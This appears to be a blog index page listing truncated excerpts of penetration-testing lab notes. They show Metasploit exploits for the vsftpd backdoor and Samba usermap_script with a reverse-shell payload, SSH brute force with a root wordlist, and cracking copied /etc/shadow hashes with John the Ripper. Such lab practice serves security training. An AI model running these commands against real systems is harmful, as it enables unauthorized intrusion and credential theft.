![](https://img-blog.csdnimg.cn/20201014180756925.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
cyber security
xiadingling
天道酬勤
展开
-
01.[21]vsftpd-linux
nmap -A 192.168.56.120nmap -sV 192.168.56.120msfconsolemsf > search vsftpdmsf > set RHOST 192.168.56.120msf > use exploit/unix/ftp/vsftpd_234_backdoormsf exploit(unix/ftp/vsftpd_234_b...原创 2018-09-20 22:19:06 · 156 阅读 · 0 评论 -
02.Use john the ripper to crack password
cat /etc/passwd (target) -----> password.txt (kali)cat /etc/shadow (target) -----> shadow.txt (kali)--unshadow/usr/sbin/unshadow password.txt shadow.txt > cracked.txt--crack pwd/us...原创 2018-09-20 22:19:34 · 1381 阅读 · 0 评论 -
03.[445]samba-linux
msf > search sambamsf > use exploit/multi/samba/usermap_script msf exploit(multi/samba/usermap_script) > set payload cmd/unix/reversemsf exploit(multi/samba/usermap_script) > set RHOST ...原创 2018-09-20 22:20:03 · 580 阅读 · 0 评论 -
04.[22]Brute Force ssh_login
use auxiliary/scanner/ssh/ssh_login set RHOSTS 192.168.56.120 set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt set VERBOSE falsemsf auxiliary(scanner/ssh/ssh_lo...原创 2018-09-20 22:20:30 · 558 阅读 · 0 评论 -
05.[135-RPC]dcom-windows-2003
root@kali:~# nmap -A -sV 192.168.1.5Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-23 21:33 EDTNmap scan report for 192.168.1.5Host is up (0.00016s latency).Not shown: 992 closed portsPORT ...原创 2018-09-20 22:21:00 · 553 阅读 · 0 评论